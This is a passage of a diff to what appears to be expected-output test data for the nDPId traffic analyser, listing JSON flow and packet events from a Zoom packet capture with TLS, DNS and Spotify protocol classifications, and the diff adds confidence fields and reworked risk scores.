O=GoDaddy.com, Inc., OU=http:\/\/certs.godaddy.com\/repository\/, CN=Go Daddy Secure Certificate Authority - G2","subjectDN":"OU=Domain Control Validated, CN=*.zoom.us","alpn":"http\/1.1","fingerprint":"F7:5A:83:A8:77:24:55:D7:6D:2E:93:F6:6E:9C:C9:7E:AD:9B:3B:E8"}}
+00890{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":112,"source":"zoom.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569520470022,"flow_last_seen":1569520470280,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":1969,"flow_avg_l4_payload_len":328,"midstream":0,"ts_msec":1569520470280,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"52.202.62.236","src_port":54866,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www3.zoom.us","ja3":"535aca3d99fc247509cd50933cd71d37","ja3s":"3c30f2c064a3aed8cd95de8d68c726a6","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"http\/1.1"}}
+01215{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":116,"source":"zoom.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1569520470022,"flow_last_seen":1569520470280,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":6125,"flow_avg_l4_payload_len":612,"midstream":0,"ts_msec":1569520470280,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"52.202.62.236","src_port":54866,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www3.zoom.us","server_names":"*.zoom.us,zoom.us","ja3":"535aca3d99fc247509cd50933cd71d37","ja3s":"3c30f2c064a3aed8cd95de8d68c726a6","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, ST=Arizona, L=Scottsdale, O=GoDaddy.com, Inc., OU=http:\/\/certs.godaddy.com\/repository\/, CN=Go Daddy Secure Certificate Authority - G2","subjectDN":"OU=Domain Control Validated, CN=*.zoom.us","alpn":"http\/1.1","fingerprint":"F7:5A:83:A8:77:24:55:D7:6D:2E:93:F6:6E:9C:C9:7E:AD:9B:3B:E8"}}
 00730{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":124,"source":"zoom.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1569520470350,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":265,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":265,"pkt_l4_len":231,"ts_msec":1569520470350,"pkt":"EBMx8Tl2KDc3AG3ICABFAAD7AABAAEAGtb7AqAF1rNkVSNZGAbt9MLg2pduNV4AYEAjK4AAAAQEICiWc3wRwmChtFgMBAMIBAAC+AwE5BEH329R9hgOe6JDNh5Do5\/IyBg\/qLeMPj9mOGNz+swAAEgAvADMANQA5wAnACsATwBRWAAEAAIP\/AQABAAAAAB0AGwAAGHd3dy5nb29nbGV0YWdtYW5hZ2VyLmNvbQAXAAAABQAFAQAAAAAzdAAAABIAAAAQADAALgJoMgVoMi0xNgVoMi0xNQVoMi0xNAhzcGR5LzMuMQZzcGR5LzMIaHR0cC8xLjEACwACAQAACgAKAAgAHQAXABgAGQ=="}
 00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":158,"source":"zoom.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520470666,"flow_last_seen":1569520470666,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1569520470666,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"192.168.1.255","src_port":57621,"dst_port":57621,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":158,"source":"zoom.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":1,"flow_last_seen":1569520470666,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1569520470666,"pkt":"\/\/\/\/\/\/\/\/KDc3AG3ICABFAABI4PAAAEARFPDAqAF1wKgB\/+EV4RUANLyaU3BvdFVkcDAJFTOWktM6lAABAARIlcIDDi3QR5gZLZgtSkZtNr91y8rdz4k="}
-00608{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":158,"source":"zoom.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520470666,"flow_last_seen":1569520470666,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1569520470666,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"192.168.1.255","src_port":57621,"dst_port":57621,"l4_proto":"udp","ndpi": {"proto":"Spotify","breed":"Acceptable","category":"Music"}}
+00634{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":158,"source":"zoom.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520470666,"flow_last_seen":1569520470666,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1569520470666,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"192.168.1.255","src_port":57621,"dst_port":57621,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Spotify","breed":"Acceptable","category":"Music"}}
 00569{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":159,"source":"zoom.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520470741,"flow_last_seen":1569520470741,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1569520470741,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"192.168.1.1","src_port":62563,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":159,"source":"zoom.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":1,"flow_last_seen":1569520470741,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1569520470741,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAOwQAAP8R\/OHAqAF1wKgBAfRjADUALIWIr1EBAAABAAAAAAAACnpvb21mcjg1emMEem9vbQJ1cwAAAQAB"}
-00738{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":159,"source":"zoom.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520470741,"flow_last_seen":1569520470741,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1569520470741,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"192.168.1.1","src_port":62563,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Zoom","breed":"Acceptable","category":"Video"},"dns": {"query":"zoomfr85zc.zoom.us","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00764{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":159,"source":"zoom.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520470741,"flow_last_seen":1569520470741,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1569520470741,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"192.168.1.1","src_port":62563,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Zoom","breed":"Acceptable","category":"Video"},"dns": {"query":"zoomfr85zc.zoom.us","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00569{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":160,"source":"zoom.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520470742,"flow_last_seen":1569520470742,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1569520470742,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"192.168.1.1","src_port":58063,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":160,"source":"zoom.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":1,"flow_last_seen":1569520470742,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1569520470742,"pkt":"EBMx8Tl2KDc3AG3ICABFAABALr4AAP8RCSjAqAF1wKgBAeLPADUALAFaRhQBAAABAAAAAAAACnpvb21mcjg0emMEem9vbQJ1cwAAAQAB"}
-00738{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":160,"source":"zoom.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520470742,"flow_last_seen":1569520470742,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1569520470742,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"192.168.1.1","src_port":58063,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Zoom","breed":"Acceptable","category":"Video"},"dns": {"query":"zoomfr84zc.zoom.us","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00764{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":160,"source":"zoom.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520470742,"flow_last_seen":1569520470742,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1569520470742,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"192.168.1.1","src_port":58063,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Zoom","breed":"Acceptable","category":"Video"},"dns": {"query":"zoomfr84zc.zoom.us","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00570{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":161,"source":"zoom.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520470742,"flow_last_seen":1569520470742,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1569520470742,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"213.19.144.105","src_port":54867,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":161,"source":"zoom.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":1,"flow_last_seen":1569520470742,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1569520470742,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGEx7AqAF11ROQadZTAbug3l1NAAAAALAC\/\/8zBgAAAgQFtAEDAwUBAQgKJZzghQAAAAAEAgAA"}
 00570{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":162,"source":"zoom.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520470755,"flow_last_seen":1569520470755,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1569520470755,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"213.19.144.104","src_port":54868,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":162,"source":"zoom.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":1,"flow_last_seen":1569520470755,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1569520470755,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGEx\/AqAF11ROQaNZUAbsLvInbAAAAALAC\/\/+bjgAAAgQFtAEDAwUBAQgKJZzgkQAAAAAEAgAA"}
 00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":163,"source":"zoom.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":2,"flow_last_seen":1569520470768,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":94,"pkt_l4_len":60,"ts_msec":1569520470768,"pkt":"KDc3AG3IEBMx8Tl2CABFAABQFgoAADcR6czAqAEBwKgBdQA19GMAPOFdr1GBgAABAAEAAAAACnpvb21mcjg1emMEem9vbQJ1cwAAAQABwAwAAQABAAABLAAE1fSMVQ=="}
-00753{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":163,"source":"zoom.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569520470741,"flow_last_seen":1569520470768,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":52,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1569520470768,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"192.168.1.1","src_port":62563,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Zoom","breed":"Acceptable","category":"Video"},"dns": {"query":"zoomfr85zc.zoom.us","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"213.244.140.85"}}
+00779{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":163,"source":"zoom.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569520470741,"flow_last_seen":1569520470768,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":52,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1569520470768,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"192.168.1.1","src_port":62563,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Zoom","breed":"Acceptable","category":"Video"},"dns": {"query":"zoomfr85zc.zoom.us","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"213.244.140.85"}}
 00570{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":164,"source":"zoom.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520470769,"flow_last_seen":1569520470769,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1569520470769,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"213.244.140.85","src_port":54869,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":164,"source":"zoom.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":1,"flow_last_seen":1569520470769,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1569520470769,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGFlHAqAF11fSMVdZVAbvq+zZHAAAAALAC\/\/8TBgAAAgQFtAEDAwUBAQgKJZzgnwAAAAAEAgAA"}
 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":165,"source":"zoom.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":2,"flow_last_seen":1569520470775,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1569520470775,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADAGIyLVE5BpwKgBdQG71lPrn+6AoN5dTqASqbAo0wAAAgQFrAQCCAp4fR7ZJZzghQEDAww="}
 00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":166,"source":"zoom.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":3,"flow_last_seen":1569520470775,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1569520470775,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGEyrAqAF11ROQadZTAbug3l1O65\/ugYAQECzxAQAAAQEICiWc4KR4fR7Z"}
-00853{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":167,"source":"zoom.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569520470742,"flow_last_seen":1569520470775,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1569520470775,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"213.19.144.105","src_port":54867,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15":"TLS (probably) not carrying HTTPS"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"zoomam105zc.zoom.us","ja3":"c51de225944b7d58d48c0f99f86ba8e6","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
+00959{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":167,"source":"zoom.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569520470742,"flow_last_seen":1569520470775,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1569520470775,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"213.19.144.105","src_port":54867,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"zoomam105zc.zoom.us","ja3":"c51de225944b7d58d48c0f99f86ba8e6","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
 00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":168,"source":"zoom.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":2,"flow_last_seen":1569520470776,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":94,"pkt_l4_len":60,"ts_msec":1569520470776,"pkt":"KDc3AG3IEBMx8Tl2CABFAABQ61QAADcRFILAqAEBwKgBdQA14s8APF0wRhSBgAABAAEAAAAACnpvb21mcjg0emMEem9vbQJ1cwAAAQABwAwAAQABAAABLAAE1fSMVA=="}
-00753{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":168,"source":"zoom.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569520470742,"flow_last_seen":1569520470776,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":52,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1569520470776,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"192.168.1.1","src_port":58063,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Zoom","breed":"Acceptable","category":"Video"},"dns": {"query":"zoomfr84zc.zoom.us","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"213.244.140.84"}}
+00779{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":168,"source":"zoom.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569520470742,"flow_last_seen":1569520470776,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":52,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1569520470776,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"192.168.1.1","src_port":58063,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Zoom","breed":"Acceptable","category":"Video"},"dns": {"query":"zoomfr84zc.zoom.us","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"213.244.140.84"}}
 00570{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":169,"source":"zoom.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520470776,"flow_last_seen":1569520470776,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1569520470776,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"213.244.140.84","src_port":54870,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":169,"source":"zoom.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":1,"flow_last_seen":1569520470776,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1569520470776,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGFlLAqAF11fSMVNZWAbv57BLmAAAAALAC\/\/8ncAAAAgQFtAEDAwUBAQgKJZzgpQAAAAAEAgAA"}
 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":170,"source":"zoom.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":2,"flow_last_seen":1569520470787,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1569520470787,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADAGIyPVE5BowKgBdQG71lTDwlhoC7yJ3KASqbBbBgAAAgQFrAQCCAp7WhBHJZzgkQEDAww="}
 00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":171,"source":"zoom.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":3,"flow_last_seen":1569520470787,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1569520470787,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGEyvAqAF11ROQaNZUAbsLvIncw8JYaYAQECwjNgAAAQEICiWc4K97WhBH"}
-00853{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":172,"source":"zoom.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569520470755,"flow_last_seen":1569520470787,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1569520470787,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"213.19.144.104","src_port":54868,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15":"TLS (probably) not carrying HTTPS"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"zoomam104zc.zoom.us","ja3":"c51de225944b7d58d48c0f99f86ba8e6","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
+00959{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":172,"source":"zoom.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569520470755,"flow_last_seen":1569520470787,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1569520470787,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"213.19.144.104","src_port":54868,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"zoomam104zc.zoom.us","ja3":"c51de225944b7d58d48c0f99f86ba8e6","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":173,"source":"zoom.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":2,"flow_last_seen":1569520470790,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1569520470790,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADMGI1XV9IxVwKgBdQG71lXIKlM86vs2SKASqbDi9AAAAgQFrAQCCAp4gwNrJZzgnwEDAww="}
 00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":174,"source":"zoom.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":3,"flow_last_seen":1569520470790,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1569520470790,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGFl3AqAF11fSMVdZVAbvq+zZIyCpTPYAQECyrLwAAAQEICiWc4LJ4gwNr"}
